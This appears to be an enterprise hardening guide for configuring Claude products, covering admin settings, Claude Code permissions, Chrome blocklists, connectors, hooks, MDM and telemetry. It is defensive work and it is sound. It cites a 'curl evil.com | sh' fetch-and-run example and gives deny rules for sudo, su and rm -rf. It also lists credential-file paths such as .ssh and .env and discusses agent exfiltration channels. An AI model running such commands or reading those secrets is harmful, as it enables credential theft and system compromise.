Claude Security for Organizations: A Practical Hardening Guide
How to configure Claude across Claude.ai, Desktop, Code, Cowork, Chrome, Connectors, Extensions, and Plugins — with the rationale behind each setting so you can adapt it to your organization.
As Claude moves from "interesting tool" to "embedded in daily workflows," the security questions shift from "is this AI safe?" to "how do we configure it like any other piece of enterprise software?" The answer is the same as for every powerful platform: least privilege, monitor everything, isolate what you can, and put humans in the loop where it matters. Most of the risk in a Claude deployment doesn't live in Claude itself — it lives in the third-party things Claude is allowed to reach.
Start with organizational hardening
These are the settings to configure first, in the Claude Admin Console. They affect everyone in your tenant and close the most common Shadow AI gaps.
Domain verification
Claim your corporate email domains through the Claude Admin Console. This automatically pulls any employee who signs up with a company email into your managed workspace — preventing personal Claude accounts from becoming the place where corporate data ends up. This is the single highest-leverage anti-Shadow-AI control available.
SSO enforcement
Enforce single sign-on for all users. This brings Claude into your existing identity perimeter, so offboarding, MFA, and conditional access policies apply automatically. Don't leave Google/Apple/magic-link login as a fallback for managed users.
Account switching → disabled
Disable account switching on corporate assets. This prevents users from logging into a personal Claude account on a managed device, bypassing every other control you've put in place.
Note: Account switching control is available on Enterprise plans only.
Zero data retention (Enterprise)
Enable zero data retention so conversations aren't stored on Anthropic's side beyond the session. For regulated industries this is usually mandatory; for everyone else it's still a sensible default.
Public Project → On
This permits sharing of projects within your organization but blocks sharing them outside — a clean balance between collaboration and data leakage prevention.
Location metadata
Allowing Claude to use coarse location metadata (city/region) to improve product experience is generally fine. On Teams and Enterprise plans the data isn't used to train models, so the trade-off is minor.
Fast Mode and Remote Control → disabled
Both expand the surface area of what Claude can do without close oversight, and neither has a strong enterprise use case that justifies the risk by default.
Cowork: the risk lives in what you connect
Cowork runs inside a sandboxed virtual machine isolated from your main OS. Within that VM, even if something goes wrong, the blast radius is limited. The actual risk doesn't come from Cowork — it comes from the Extensions and Connectors (MCP) you allow it to reach, which operate outside the sandbox into your real data, real browser sessions, and real SaaS accounts.
Settings to configure
- DispatchDisabled
- "Always allow for connected tools"Off
- Scheduled TasksReview & minimise
Audit gap: Cowork session content is not captured in Audit Logs, the Compliance API, or Data Exports today. Conversation history sits locally on user machines. The OpenTelemetry section below is your only real telemetry source for Cowork.
Claude Code: terminal power, terminal-level risk
Claude Code runs in the terminal and inherits the user account's permissions. Treat it like any developer tool that can shell out: useful, fast, and dangerous if misconfigured.
Permission modes
- Claude in the webDisabled
- Always Bypass permissionDisabled
- Allow auto permissionAllowed with documented expectations
Network egress → Package Managers + internal repos only
The single most effective Claude Code hardening lever — stops curl evil.com | sh patterns dead while leaving npm install and your internal Artifactory/Nexus working normally.
Denied commands
Bash(sudo:*)
Bash(su:*)
Bash(rm -rf*)Always-ask paths
Force a permission prompt for reads of sensitive files. A read of ~/.ssh plus outbound network access is instant credential exfiltration.
Read(**/.env)
Read(**/.env.*)
Read(**/secrets/**)
Read(**/.ssh/**)
Read(**/credentials.*)Claude in Chrome: high utility, high surface
Chrome integration operates outside the VM sandbox, in the user's real browser with real cookies. That's what makes it useful, and that's what makes it risky.
- "Ask before Acting"Mandatory
- SaaS portals, email, password vaults, finance, HR domainsBlocklisted
- Storage & mail domains (exfil risk)Blocklisted
Note: The domain blocklist does not support wildcards as of current testing. Plan your blocklist as an explicit list of fully-qualified domains and revisit it on a schedule.
Connectors (MCP): where most of the real risk lives
Connectors let Claude reach third-party applications and read — or write — data in them. Always follow Least privileged access.
DLP gap: Most DLP tools miss or under-monitor AI agent activity. When a Connector has Write or Edit permissions on Storage or Mail, you've effectively created a data exfiltration channel that may not appear in your existing DLP dashboards.
- Write/Edit on Storage & Mail connectorsAvoid unless justified
- Connector permission audit cadenceQuarterly minimum
- managed-MCP (Claude Code CLI)Allowlist only
Scope note: managed-MCP applies to Claude Code CLI only, not Claude Desktop. For Desktop, control MCP through the Admin Console MDM settings.
Extensions
Extensions let Claude interact directly with apps, data, and tools on the user's machine. Review every Extension in the catalog and allow only those that map to a documented organisational need. Follow least privileged access, periodic review — same principle as Connectors.
Plugins
A Plugin is a package containing Skills, MCP servers, agents, and hooks. The risk profile is whatever the bundled MCP servers, Extensions, and Connectors bring with them. Vet plugins by what they contain, not by the plugin abstraction itself.
Guardrails and monitoring
You cannot govern what you cannot see. Three telemetry layers are needed for a complete picture.
OpenTelemetry (OTEL) for Claude Code and Cowork
Claude Code exports user prompts, API requests, and tool results. The prompt.id attribute ties every event back to the single user prompt that triggered it — giving you full audit trails of any session.
Cowork OTel events cover: full text of user prompts, every tool and MCP invocation (server name, tool name, parameters, success/failure, execution time), file paths read or modified, skills and plugins invoked, human approval decisions, and API requests and errors.
User prompt content is included by default in Cowork OTel. If your policies prohibit logging prompt content into a SIEM, configure filtering/redaction at your collector. Tool parameters can also contain sensitive values — plan retention and access policies before enabling.
Compliance API (Enterprise)
Real-time, programmatic access to audit logs across Claude usage. Logs admin activities (member changes, API keys, access settings, sign-ins) and resource activities (file creation, downloads, deletion). This is the control-plane audit log, not a conversation transcript. Enable it — the half-day integration cost is trivial compared to the audit-readiness value.
The complete monitoring picture
- Compliance APIControl plane — admin activity & config changes
- OpenTelemetryAgent plane — what Code & Cowork actually did
- Network / LLM gatewayTool & exfiltration plane — egress monitoring
Human in the loop
Require manual approval for any task or CLI-generated code before it is committed, even in Auto Mode. Auto Mode lets Claude execute lower-risk, repeatable actions without prompting each time, while still surfacing prompts for higher-risk operations. It's a productivity tool, not an autopilot — the developer is still accountable for everything that gets through, and your governance policies should reflect that explicitly.
Hooks (Claude Code CLI and Agent SDK)
Hooks let you enforce rules on what Claude can do, every time, no exceptions. They apply to Claude Code CLI and the Agent SDK only — not Claude Desktop.
| Hook | Purpose |
|---|---|
| PreToolUse | Intercept a tool call before it runs — allow, block, or modify it |
| PostToolUse | React after a tool runs — log, format, or validate the result |
| UserPromptSubmit | Inspect or block a user's prompt before Claude sees it |
| PermissionRequest | Auto-approve or auto-deny permission dialogs without human input |
| Stop | Trigger actions when Claude finishes — or force it to keep working |
| InstructionsLoaded | Audit which CLAUDE.md instruction files were loaded into a session |
Use PreToolUse for hard blocks on dangerous commands, UserPromptSubmit for prompt-content classification, and InstructionsLoaded for supply-chain visibility on which CLAUDE.md files were loaded into a session.
Pushing settings via MDM
Claude Desktop settings can be enforced from the Organisation Admin Console. Claude Code CLI settings must be pushed via your MDM (Jamf, Intune, Kandji, SCCM) — don't rely on developers configuring this themselves.
MDM-distributable controls for Claude Desktop
- Manage Auto UpdatesConfigure
- Enable Desktop ExtensionsConfigure
- Enable Extension DirectoryConfigure
- Enable Local MCP ServersConfigure
- Enable Claude Code for DesktopConfigure
- Enable Secure VM Features (Cowork)Configure
- Require Signed Desktop ExtensionsEnabled
- Disabled Built-in ToolsPer policy
- Managed MCP ServersAllowlist via MDM
Routines and Scheduled Tasks
Routines (Claude Code) and Scheduled Tasks (Cowork) both execute without a human watching. Review the inventory regularly, scope them tightly, and treat each one as a standing automation that needs the same review you'd give a cron job in production.
Quick reference: sane default configuration
- Domain verificationEnabled
- SSO enforcementEnabled
- Account switchingDisabled (Enterprise)
- Zero data retentionEnabled (Enterprise)
- Public ProjectOn — within-org only
- Fast Mode & Remote ControlDisabled
- Cowork DispatchDisabled
- Cowork "always allow for connected tools"Off
- Claude in Chrome — Ask Before ActingMandatory
- Claude Code web accessDisabled
- Claude Code bypass permissionsDisabled
- Network egressPackage managers + internal repos
- Connectors — Storage/Mail WriteAvoid unless justified
- managed-MCPAllowlist only
- ExtensionsReviewed · signed · minimal scope
- Hooks (PreToolUse, UserPromptSubmit)Enabled
- OpenTelemetry → SIEMEnabled
- Compliance APIEnabled (Enterprise)
- Human-in-the-loop on commitsMandatory
The thing to internalise is that Claude itself is not the primary risk — the risk surface is everything Claude touches on your behalf. Sandboxes are great for code execution, but they don't help when the agent is reading your inbox or writing to your shared drive through a Connector you over-permissioned.
Configure with least privilege. Monitor with OTEL + Compliance API + egress controls. Keep humans in the loop for anything that writes, sends, or commits. Revisit settings quarterly — both your environment and Claude's feature set will keep evolving.
That's the whole posture. Everything else is implementation detail.